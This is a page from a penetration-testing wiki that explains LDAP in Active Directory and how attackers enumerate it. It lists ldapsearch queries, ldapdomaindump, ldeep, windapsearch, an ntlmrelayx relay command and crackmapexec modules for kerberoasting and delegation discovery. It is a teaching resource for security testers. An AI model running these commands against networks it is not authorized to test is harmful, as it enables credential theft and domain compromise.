Bebzounette
  • Bebzounettes
  • Active Directory
    • Recon
      • TCP/UDP
      • DNS
      • NetBIOS
      • RPC
      • LDAP
      • HTTP
      • Responder
      • ADRecon
      • BloodHound
      • Network Shares
      • Password Policy
      • Enumeration
        • Domain
        • Powerview
        • .NET Classes
    • Lateral movement
      • Code execution
        • PSExec
        • SMBExec
        • WMIexec / WMI
        • ATExec / SchTaskExec
        • 🚧DCOMExec / DCOM
        • Powershell Remoting - WinRM
        • Crackmapexec
        • Service Control (SC)
      • Credentials
        • Finding
          • Guessing
          • Bruteforce
          • Spraying
        • Dumping
          • SAM Base
          • LSA Secrets
          • LSASS Process
          • DPAPI secrets
          • NTDS.DIT
          • Group Policy Preferences
          • User description
        • Impersonnification
        • Cracking
      • Coercition
        • MS-RPRN (PrinterBug)
        • MS-EFSR (PetitPotam)
        • MS-DFSNM (DFSCoerce)
        • MS-FSRVP (ShadowCoerce)
        • WebClient (WebDAV)
      • Relay
      • Kerberos
        • Kerberoasting
        • AS-REP Roasting
        • 🚧Pass the Hash/Ticket
        • 🚧MSSQL Trusted Links
        • Forged Tickets
        • 🚧Delegations
          • Unconstrained Delegation
          • Constrained Delegation
          • (RBCD) Resource-Based Constrained
      • GPOs
      • DACL
      • Certificates Service (AD-CS)
      • Privileged Groups
        • DNS Admin
        • Backup Operator
      • Built-in Misconfigurations
        • PASSWD_NOTREQD
        • DONT_EXPIRE_PASSWORD
        • MachineAccountQuota
        • LAPS
      • CVEs
        • EternalBlue | MS17-010
        • Zerologon (CVE-2020-1472)
        • SamTheAdmin (CVE-2021-42278)
        • Certifried: (CVE-2022–26923)
    • 🚧Persistance & Exfiltration
      • Golden Ticket
      • Silver Ticket
      • Skeleton Key
      • DSRM
      • Custom SSP
      • AdminSDHolder
    • 🚧Cross Trust Attack
      • Across Domain
      • Across Forest
    • References
  • Systems
    • 🚧Windows
      • Informations d'identifications
      • Configuration des services
    • 🚧Linux
    • 🚧Mobile & IOT
  • Web
    • CheckList & Méthodologie
    • 🚧Pentest API
    • 🚧Wordpress
    • 🚧Jenkins
    • 🚧IIS Server
  • Applicatives vulnerabilities
    • Buffer-Overflow
  • Thick Client
    • Thick Client Methodology
  • Wireless Security
    • WIFI
    • 🚧ZIGBEE
    • 🚧ZWAVE
    • GNU-RADIO
  • Network
    • Modèle OSI & Adressage IPV4
    • 🚧DOS & DDOS
    • VOIP
  • Physical Access
    • 🚧Lock Picking
    • Matériels
    • Accès physique à un ordinateur
  • Forensic
    • Outils de Forensic
  • Information gathering
    • Scans
  • Services
    • Echo - 7
    • FTP - 21
    • SSH - 22
    • Telnet - 23
    • SMTP - 25/465/587
    • Whois - 43
    • Finger - 79
    • POP3 - 110
    • NTP - 123
    • MSRPC - 135/593
    • IMAP - 143
    • SMB - 445
    • RDP -3389
    • References
  • Github Repos
    • Repos Github
      • Windows
      • Pivoting
      • SQL Server
      • Web
      • Active Directory
  • Blog
    • Guide to NTLMv1 attacks
    • Local Privilege Escalation through ShadowCredentials
    • Resource Based Constrained Delegation in Active Directory
  • Contact
Powered by GitBook
On this page
  • Theory
  • Practical Exploitation:
  • References:

Was this helpful?

  1. Active Directory
  2. Recon

LDAP

Lightweight Directory Access Protocol (LDAP) holds a pivotal role for authentication and retrieving information, especially within Microsoft's Active Directory.

PreviousRPCNextHTTP

Last updated 1 year ago

Was this helpful?

Theory

  1. What is LDAP? LDAP, or Lightweight Directory Access Protocol, is a widely-used protocol for querying and modifying directory services. It functions as a hierarchical database designed to manage and provide access to various kinds of information, including user accounts, groups, network resources, and more. LDAP operates over TCP/IP, typically on port 389, and can be secured with SSL/TLS as LDAPS (LDAP over SSL) on port 636.

  2. LDAP in Active Directory In an Active Directory (AD) environment, LDAP is a fundamental component. AD is a centralized authentication and directory service created by Microsoft. It stores information about users, computers, groups, and other network resources in a hierarchical structure. LDAP serves as the primary means of accessing and modifying this data within AD.

  3. LDAP Objects and Attributes LDAP organizes information in the form of objects, each with specific attributes. For instance, a user object might have attributes like 'cn' (common name), 'uid' (user ID), 'memberOf' (group memberships), and more. It is important to focus on identifying objects and their attributes to exploit misconfigurations or vulnerabilities.

  4. LDAP Signing involves digitally signing LDAP packets, ensuring the integrity and authenticity of data exchanged between the client and the server. This prevents attackers from tampering with or injecting malicious data into LDAP communications. When LDAP signing is enforced, Domain Controllers will not allow any authentication requests without a valid signature. LDAP signing ensures that the request received by the server (Domain Controller) was sent by the client the LDAP message is purported to be from. Additionally, signing certifies that the LDAP messages are not modified or tampered with. By default, Active Directory does not require LDAP communication to be signed, which can be exploited through relay attack.

  5. , on the other hand, enhances security by binding the integrity of the TLS session to the LDAP session. Basically, LDAP channel binding is the act of tying the TLS tunnel and the application layer (leveraged by LDAP) together to create a unique identifier (channel binding token) for that specific LDAP session. This channel binding token (CBT) can only be used within that TLS tunnel and therefore prevents a “stolen” LDAP ticket from being leveraged elsewhere. By default, Active Directory does not require LDAP Channel Binding to be enabled, which can be exploited through relay attack.

Practical Exploitation:

1. Enumeration and Information Gathering: The first step is to enumerate information about the target Active Directory environment. Use the ldapsearch utility to retrieve valuable information:

ldapsearch -x -h <target_IP> -p 389 -s base naming_contexts
ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(objectClass=*)"

from dirkjamn that supports NTLM hash authentication:

python ldapdomaindump.py -u <username> -p <password> <target_IP>

Dump LDAP info with that supports NTLM hash and certificate authentication:

ldeep ldap -u <username> -p <password> -d <target_domain> -s ldap://<DC_IP> 

Dump all users

with :

windapsearch -d <target_domain> -U <username> -P <password> -U 

To dump LDAP information with :

ntlmrelayx.py -t ldaps://<DC_IP> -

Some information can be gathered with LDAP modules:

# Keberoasting/ASRepRoasting
cme ldap <DC_IP> -u <username> -p <password> --kerberoasting output.txt

# Delegation
cme ldap <DC_IP> -u <username> -p <password> --trusted-for-delegation

# Check for LDAP Signing 
cme ldap <DC_IP> -u <username> -p <password> -M ldap-checker

# list PKIs/CAs
cme ldap <DC_IP> -u <username> -p <password> -M adcs

# list subnets referenced in AD-SS
cme ldap <DC_IP> -u <username> -p <password> -M subnets

# machine account quota
cme ldap <DC_IP> -u <username> -p <password> -M maq

# users description
cme ldap <DC_IP> -u <username> -p <password> -M get-desc-users

2. Identifying Users and Groups: To identify users and groups, leverage the '(&(objectCategory=person)(objectClass=user))' filter in ldapsearch:

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(&(objectCategory=person)(objectClass=user))"

3. Exploiting Weak Permissions: Misconfigured permissions can lead to unauthorized access. Identify sensitive objects with overly permissive ACLs (here is an example that searches every account with an SPN set and the attributes AdminCount equal to 1):

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(|(adminCount=1)(servicePrincipalName=*))"

4. Abusing Privileged Groups Identify users in privileged groups like Domain Admins and exploit their privileges:

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(&(memberOf=CN=Domain Admins,CN=Users,<base_DN>)(objectClass=user))"

References:

Channel Binding
ldapdomaindump
ldeep
Windapsearch
ntlmrelayx
CrackMapExec
GitHub - dirkjanm/ldapdomaindump: Active Directory information dumper via LDAPGitHub
IntroductionThe Hacker Recipes
NTLM Relayhackndo
Logo
Logo
Logo